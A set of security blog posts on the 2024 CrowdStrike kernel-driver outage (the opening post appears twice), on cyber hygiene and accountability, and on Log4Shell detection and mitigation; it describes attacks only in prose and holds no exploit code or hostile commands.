Imagine you are a security manager being asked to do a security assessment on a new software for your organisation. It will be deployed across all Windows workstations and servers and operate as a boot-start driver in kernel mode, granting it extensive access to the system. The driver has been signed by Microsoft’s Windows Hardware Quality Labs (WHQL), so it is considered robust and trustworthy. However, additional components that the driver will use are not included in the certification process. These components are updates that will be regularly downloaded from the internet. As a security manager, would you have any concerns?
I would be, but what if it were a leading global cybersecurity vendor? Do we have too much assumed and transitive trust in cybersecurity vendors?
The recent CrowdStrike Blue Screen of Death (BSOD) incident has raised significant concerns about the security and reliability of kernel-mode software, even when certified by trusted authorities. On July 19, 2024, a faulty update from CrowdStrike, a widely used cybersecurity provider, caused thousands of Windows machines worldwide to experience BSOD errors, affecting banks, airlines, TV broadcasters, and numerous other enterprises.
This incident highlights a critical issue that security managers must consider when assessing new software, particularly those operating in kernel mode. CrowdStrike’s Falcon sensor, while signed by Microsoft’s Windows Hardware Quality Labs (WHQL) as robust and trustworthy, includes components that are downloaded from the internet and not part of the WHQL certification process.
The CrowdStrike software operates as a boot-start driver in kernel mode, granting it extensive system access. It relies on externally downloaded updates to maintain quick turnaround times for malware definition updates. While the exact nature of these update files is unclear, they could potentially contain executable code for the driver or merely malware definition files. If these updates include executable code, it means unsigned code of unknown origin is running with full kernel-mode privileges, posing a significant security risk.
The recent BSOD incident suggests that the CrowdStrike driver may lack adequate resilience, with insufficient error checking and parameter validation. This became evident when a faulty update caused widespread system crashes, indicating that the software’s error handling mechanisms could not prevent catastrophic failures.
For security managers, this incident serves as a stark reminder of the potential risks associated with kernel-mode software, even when it comes from reputable sources. It underscores the need for thorough assessments of such software, paying particular attention to:
1. Update mechanisms and their security implications
2. The scope of WHQL certification and what it does and does not cover
3. Error handling and system stability safeguards
4. The potential impact of software failures on critical systems
While CrowdStrike has since addressed the issue and provided fixes, the incident has caused significant disruptions across various sectors. It has also prompted discussions about balancing rapid threat response capabilities and system stability in cybersecurity solutions.
In conclusion, this event emphasises the importance of rigorous security assessments for kernel-mode software, regardless of its certifications or reputation. Security managers must carefully weigh the benefits of such software against the potential risks they introduce to system stability and security.
Imagine you are a security manager being asked to do a security assessment on a new software for your organisation. It will be deployed across all Windows workstations and servers and operate as a boot-start driver in kernel mode, granting it extensive access to the system. The driver has been signed by Microsoft’s Windows Hardware Quality Labs (WHQL), so it is considered robust and trustworthy. However, additional components that the driver will use are not included in the certification process. These components are updates that will be regularly downloaded from the internet. As a security manager, would you have any concerns?
I would be, but what if it were a leading global cybersecurity vendor? Do we have too much assumed and transitive trust in cybersecurity vendors?
The recent CrowdStrike Blue Screen of Death (BSOD) incident has raised significant concerns about the security and reliability of kernel-mode software, even when certified by trusted authorities. On July 19, 2024, a faulty update from CrowdStrike, a widely used cybersecurity provider, caused thousands of Windows machines worldwide to experience BSOD errors, affecting banks, airlines, TV broadcasters, and numerous other enterprises.
This incident highlights a critical issue that security managers must consider when assessing new software, particularly those operating in kernel mode. CrowdStrike’s Falcon sensor, while signed by Microsoft’s Windows Hardware Quality Labs (WHQL) as robust and trustworthy, includes components that are downloaded from the internet and not part of the WHQL certification process.
The CrowdStrike software operates as a boot-start driver in kernel mode, granting it extensive system access. It relies on externally downloaded updates to maintain quick turnaround times for malware definition updates. While the exact nature of these update files is unclear, they could potentially contain executable code for the driver or merely malware definition files. If these updates include executable code, it means unsigned code of unknown origin is running with full kernel-mode privileges, posing a significant security risk.
The recent BSOD incident suggests that the CrowdStrike driver may lack adequate resilience, with insufficient error checking and parameter validation. This became evident when a faulty update caused widespread system crashes, indicating that the software’s error handling mechanisms could not prevent catastrophic failures.
For security managers, this incident serves as a stark reminder of the potential risks associated with kernel-mode software, even when it comes from reputable sources. It underscores the need for thorough assessments of such software, paying particular attention to:
1. Update mechanisms and their security implications
2. The scope of WHQL certification and what it does and does not cover
3. Error handling and system stability safeguards
4. The potential impact of software failures on critical systems
While CrowdStrike has since addressed the issue and provided fixes, the incident has caused significant disruptions across various sectors. It has also prompted discussions about balancing rapid threat response capabilities and system stability in cybersecurity solutions.
In conclusion, this event emphasises the importance of rigorous security assessments for kernel-mode software, regardless of its certifications or reputation. Security managers must carefully weigh the benefits of such software against the potential risks they introduce to system stability and security.
It was just over thirty years when Tim Berners-Lee’s research at CERN, Switzerland, resulted in World Wide Web, which we also Know as the Internet today. Who would have thought, including Tim, that the Internet will become such a thing as today? This network of networks impacts every aspect of life on Earth and beyond. People are never connected ever before. The Internet has given way for new business models and helped traditional businesses find new and innovative ways to market their products.
Unfortunately, like everything else, we have evil forces on the Internet who are trying to take advantage of the vulnerabilities of the technologies for their vested interests. As first-generation users of the Internet, everything for us was new. Whether it was online entertainment or online shopping, we were the first to use it. We grew up with the Internet. We all had been the victims of the Internet or cybercrimes at some point in our lives. This created a whole new industry now called “cybersecurity”, which is seen as the protectors of cybercrimes. However, it has always been a big challenge to fix who is responsible for the security, business or cybersecurity teams.
What is the need to fix responsibility?
Globalisation and more recently, during the pandemic, has increased the number of people working remotely. It has become an ever-increasing headache for companies. As a result, the number of security incidents has increased manifolds, including the cost per incident. The cost of cyber incidents is increasing year on year basis.
According to IBM’s Cost of a Data Breach 2021 report, the average cost of a security breach costs businesses upward of $4.2 million.
Governments mandate cybersecurity compliance requirements, non-compliance of which attract massive penalties in some jurisdictions. For example, non-compliance with Europe’s General Data Protection Rule (GDPR) may see companies be fined up to €20 million or 4 per cent of their annual global turnover.
Companies that traditionally viewed security as a cost centre are now viewing it differently due to the losses they incur because of the breaches and penalties. We have seen a change in the attitude of these organisations due to the above reasons. Today, companies see security as everyone’s responsibility instead of an IT problem.
Cyber-hygiene: Challenges and repercussions of a bad one.
Cyber hygiene, like personal hygiene, is the set of practices that organisations deploy to ensure the security of the data and networks. Maintaining basic cyber-hygiene is the difference between being breached or quickly recovering from the one without a massive impact on the business.
Cyber hygiene increases the opportunity cost of the attack for the cybercriminals by reducing vulnerabilities in the environment. By practising cyber hygiene, organisations improve their security posture. They can become more efficient to defend themselves against persistent devastating cyberattacks. Good cyber-hygiene is already being incentivised by reducing the likelihood of getting hacked or penalised by fines, legal costs, and reduced customer confidence.
The biggest challenge in implementing a good cyber hygiene practice requires knowing what we need to protect. Having a good asset inventory is a first to start. In a hybrid working environment having clear visibility of your assets is important. You can’t protect something you don’t know. Therefore, it is imperative to know where your information assets are located on your network and who is using them. It is also very important to know where the data is located and who can access it.
Another significant challenge is to maintain discipline and continuity over a long period. Scanning your network occasionally will not help stop unrelenting cyberattacks. Therefore, automated monitoring must be implemented to continuously detect and remediate threats, which requires investment in technical resources that many businesses don’t have.
Due to the above challenges, we often see poor cyber hygiene resulting in security vulnerabilities and potential attack vectors. Following are some of the vulnerabilities due to poor hygiene:
Unclassified Data: Inadequate data classification result in misplaced data and, therefore, stored in places that may not be adequately protected.
Data Loss: Poor and inadequate data classification may result in data loss due to a lack of adequate protection controls. Data may not be recovered because of a data breach, hardware failure, or improper data handling if it is not regularly backed up and tested for corruption.
Software vulnerabilities: All software contains software vulnerabilities. Developers release patches regularly to fix these vulnerabilities. A lack of or poor patch management process will leave software vulnerable, which hackers can potentially exploit to gain access to the network and data.
Poor endpoint protection: According to AV-TEST Institute, they register over 450,000 new malicious applications (malware) and potentially unwanted applications in the wild every day. Due to the inadequate endpoint protection cyber hygiene practices, including malware protection tools, hackers can use a wide range of hacking tools and techniques to get inside your network to breach the company’s environment stealing data.
Inadequate vendor risk management: With ever-increasing supply chain attacks, comprehensive vendor risk management must be implemented considering the potential security risks posed by third-party vendors and service providers, especially those with access to and processing sensitive data. Failure to implement such a process will further expose service disruptions and security breaches.
Poor compliance: Poor cyber hygiene often results in the non-compliance of various legal and regulatory requirements.
Building Accountability within your cybersecurity organisation
With ever-increasing breaches and their impacts, we shall start considering as an industry and society to motivate organisations to make cybersecurity a way of life. Cyber hygiene must be demanded from the organisations that hold, process, and use your data.
Now that we understand the challenges of having good cyber hygiene, we must also understand what we have been doing to solve these issues. So far, we have tried many ways. Some companies have internally developed controls, and others externally mandated rules and regulations. However, we have failed to address the responsibility and accountability issue. We have failed to balance the business requirements and the rigour required for cybersecurity. For example, governments have made laws and regulations with punitive repercussions without considering how a small organisation will be able to implement controls to comply with these laws and regulations.
There are no simple solutions for this complex problem. Having laws and regulations definitely raises the bar for organisations to maintain a good cybersecurity posture, but this will not keep the hackers out forever. Organisations need to be more proactive in introducing more accountability within their security organisation. Cybersecurity professionals need to take responsibility and accountability in preventing and thwarting a cyberattack. At the same time, business leaders need to understand the problem and bring the right people for the job to start with. Develop and implement the right cybersecurity framework which aligns with your business risks. Making cybersecurity one of the strategic pillars of the business strategy will engrain an organisation’s DNA.
There are many ways we can start this journey. To start with, organisations will need glue, a cybersecurity framework. Embracing frameworks like the National Institute of Standards and Technology (NIST) Cyber Security Framework (CSF)
NIST-CSF is a great way to start baselining your cybersecurity functions. It provides a structured roadmap and guidelines to achieve good cyber hygiene. In addition, CSF provides guidance on things like patching, identity & access management, least-privilege principles etc., which can help protect your organisation. If and when you get the basics along with automation, your organisation will have more time to focus on critical functions. In addition, setting up the basic-hygiene processes will improve user experience, predictable network behaviour and therefore fewer service tickets.
Research has shown that the best security outcomes are directly proportional to employee engagement. Organisations may identify “Security Champions” within the business who can evangelise security practices in their respective teams. The security champions can act as a force multiplier while setting up accountabilities. They can act as your change agents by identifying issues quickly and driving the implementation of the solutions.
Conclusion
There is no good time to start. However, the sooner you start addressing and optimising your approach to cyber-hygiene and cybersecurity, the faster you will achieve assurance against cyberattacks. This will bring peace of mind knowing the controls are working and are doing what they are supposed to. You will not be scrambling during a breach to find solutions to the problem but ready to respond to any eventuality.
Besides poor cyber hygiene, if your organisation has managed to avoid any serious breach, it is just a matter of time before your luck will run out.
On 10th Dec 2021, a zero-day vulnerability was announced in Apache’s Log4j library, which has made Log4shell one of the most severe vulnerabilities since Heartbleed. Exploiting this vulnerability is trivial, and therefore we have seen new exploits daily since the announcement. Some of us will be spending this holiday period mitigating this vulnerability.
Since the announcement last weekend, a lot has been written about Log4Shell. Researchers are finding new exploits in the wild and are adjusting the response. I am not trivialising the extent and impact of this vulnerability with the title of this post. Still, I would like to suggest taking a step back, bringing some calm and strategising the mitigation plan. We are in the early stages of the response, and if the past week is any indication, we are here for the long haul.
In this post, I will be focussing on the two aspects of this zero-day. Technical aspects, for sure, is paramount and requires immediate attention. However, the long-term governance is equally important and will ensure that we are not blindsided with that one insignificant application, which was ignored or seen as low-risk.
So, what is Log4Shell vulnerability?
Apache’s Log4j API1, an open-source Java-based logging audit framework, is commonly used by many apps and services. As a result, an attacker can use a well-crafted exploit to break into the target system, steal credentials and logins, infect networks, and steal data. Due to the extent of the use of this library, the impact is far-reaching. In addition, log4j is used worldwide across software applications and online services, and the vulnerability requires very little expertise to exploit. These far-reaching consequences make Log4shell potentially the most severe computer vulnerability in years.
The “Log4Shell” (CVE-2021–44228) is the name given to the vulnerability in the Log4J library. Apache Log4j2 2.14.1 and below are susceptible to a remote code execution vulnerability where a remote attacker can leverage this vulnerability to take full control of a vulnerable machine. The Log4Shell vulnerability is exploited by injecting a JNDI2 LDAP3 string into the logs, triggering Log4j to contact the specified LDAP server for more information.
In a malicious scenario, the attacker can use the LDAP server to serve the malicious code back to the victim’s machine, which will then be automatically executed in the memory. Data injected by an untrusted entity for merely logging into a file can take over the logging server. What this means for you is an instruction to log activity, but if exploited can soon become a data-leak scenario or run the malicious code for once scenario.
Simply, an event log intended and required for completeness could turn into a malware implantation event. This is nasty and requires taking all necessary steps to ensure that you don’t fall victim to this malicious scenario.
Am I affected?
Overwhelmingly “yes”, unless proven otherwise. Almost every software or service will have some sort of logging capability. Software’s behaviours are logged for development, operational and security purposes. Apache’s Log4j is a very common component used for this purpose.
For individuals, Log4jshell will most certainly impact you. Most devices and services you use online daily will be impacted. Keep an eye on the updates and instructions from the vendors of these devices and services for the next few days and weeks. As soon as the vendor releases a patch, update your devices and services to mitigate the risk associated with this vulnerability.
For businesses, it is going to be very tricky, and the true impact may not be clear immediately. In addition, even though Apache has already recommended upgrading to Version 2.17, there may be various implementations of the Log4J library. So again, keep an eye on the vendors releasing patches and installing as soon as possible.
How to find if your server is impacted or not?
The answer to this question is not straightforward. It is challenging to find if a given server is affected or not by the vulnerability in your network. You might assume that only the public-facing servers running code written in Java handle incoming requests handled by Java software and the Java runtime libraries. Then, for sure, you can consider yourself safe if the frontend is built products such as Apache’s-HTTPd web server, Microsoft IIS, or Nginx as all these servers are coded in C or C++.
As more information is coming on the breadth and depth of this vulnerability, it looks the Log4Shell is not limited to servers coded in Java. Since it is not the TCP-based socket handling code vulnerability, it can stay hidden in the network where user-supplied data is processed, and logs are kept even if the frontend is a non-java platform, you may get caught between what you know and all those third-party java libraries that might make part of the overall application code vulnerable to this vulnerability.
Ideally, every application on your network must be evaluated that is written in Java for the Log4j library. You can take the following two approaches:
Search for Vulnerable Code: Initiate a search for vulnerable code by scanning all servers and applications for vulnerable versions of Log4j libraries. Since Log4j code could be buried deep inside a Java class, a basic search for Log4j will not be good enough. To be certain, you may have to use additional tools and techniques. There are two (2) open-source scanning tools available that can list out code versions or vulnerable code: • Grype (https://github.com/anchore/grype) — Searches libraries installed on a system and displays vulnerabilities present • Syft (https://github.com/anchore/syft) — Searches for installed code and libraries and displays their versions
2. Active Scanning of Deployed Code: Nessus with updated plugins can be used for active vulnerability scanning to identify if the vulnerability exists or not. Some security vendors have also set up public websites to conduct minimal testing against your environment. Following are some of the open-source and commercial tools that can be used for the active scanning:
How can I mitigate Log4Shell and prevent an attack?
In principle, the prevention and prevention techniques are no different from a response to any zero-day, for that matter. The vulnerability is both complex and trivial to exploit, and therefore, it doesn’t necessarily mean that the vulnerability can be successfully exploited. Some of several pre- and postconditions are met for a successful attack. Some of these pre-conditions, such as the JVM being used, the server/app configuration, version of the library etc., will decide successful exploitation. On 17th Dec, Apache Foundation announced the original fix was incomplete and released the second fix in version 2.17.0.
At the time of writing, this post following is the current list of vulnerabilities and recommended fixes: • CVE-2021–44228 (CVSS score: 10.0) — A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0) • CVE-2021–45046 (CVSS score: 9.0) — An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0) • CVE-2021–45105 (CVSS score: 7.5) — A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0) • CVE-2021–4104 (CVSS score: 8.1) — An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.0)
The Swiss Government’s CERT provides quite a good visualisation of the attack sequence recommending mitigations for each of the vulnerable points in the sequence.
Where from here?
Keep Calm and Carry On……. We are here for the long haul, and there is no easy fix. You may find that you have fixed one app or server today; something else will pop-up next morning. If you have not done it yet, the best will be to set up a generic incident response playbook for zero-day vulnerabilities. This will help you respond to any such event in the future in a systematic way. The key to success here is keeping an eye on the tools and techniques and their effectiveness to respond to any new zero-day.
As far as Log4Shell is concerned, we are still in the early days and can’t be sure that once patched, and there will never be something else. This is evident from the fact that in the last week or so since the announcement of the original CVE, three more have been attributed to Log4J libraries. As a result, the Apache Foundation has recommended the following mitigations to prevent the exploitation of vulnerable code.
First, upgrade vulnerable versions of Log4j to version 2.17.0 or apply vendor-supplied patches. Although, for some reason, if it is not possible to upgrade, some workarounds can be used. However, there is always some risk of additional vulnerabilities (CVE-2021–45046) that will make the workarounds ineffective. Therefore, it will be best to upgrade to version 2.17. In addition to the above, some of the common mitigations must be considered and applied. • Isolate systems must be restricted into their security zones, i.e. DMZs or VLANs. • All outbound network connections from servers are blocked unless required for their functional role. Even then, restrict outbound network connections to only trusted hosts and network ports. • Depending on your endpoint protection strategy, update any signature or plugin to prevent Log4j exploitation. • Continuous monitoring of networks and servers for any indicators of compromise (IOC). • It has been seen that even after the patch is implemented, vulnerability may persist. Therefore, testing and retesting after the patch is implemented must be ensured as part of the mitigation plan. The time we are living in, such events have become a norm. Vulnerable code, unfortunately, is inevitable, and there will always be someone who would be keen to identify such code to exploit for vested interest. It is only time when we will be hacked, and that one incident may disrupt your business. Therefore, it is paramount to develop and implement business continuity plans that can minimise the impact of such an event. These plans must be updated and tested regularly to ensure changing threat scenarios. Security incident response plans must be practised regularly as a “way of life” and adjusted when a new vulnerability or a threat scenario is identified.
In situations like Log4j zero-day, one can get overwhelmed with the sheer volume of work that we need to do to protect ourselves. As Huntress Labs Senior Security Researcher John Hammond said, “All threat actors need to trigger an attack is one line of text,” but the responders need to spend hours, days and weeks on protecting themselves. In such overwhelming scenarios, I will recommend taking a long breath and keeping calm while doing what we need to do. Reach out to people, and don’t be shy to ask for help if you are stressed. I wish all the best to all of you who will be required to stay back during the holiday to keep your businesses protected.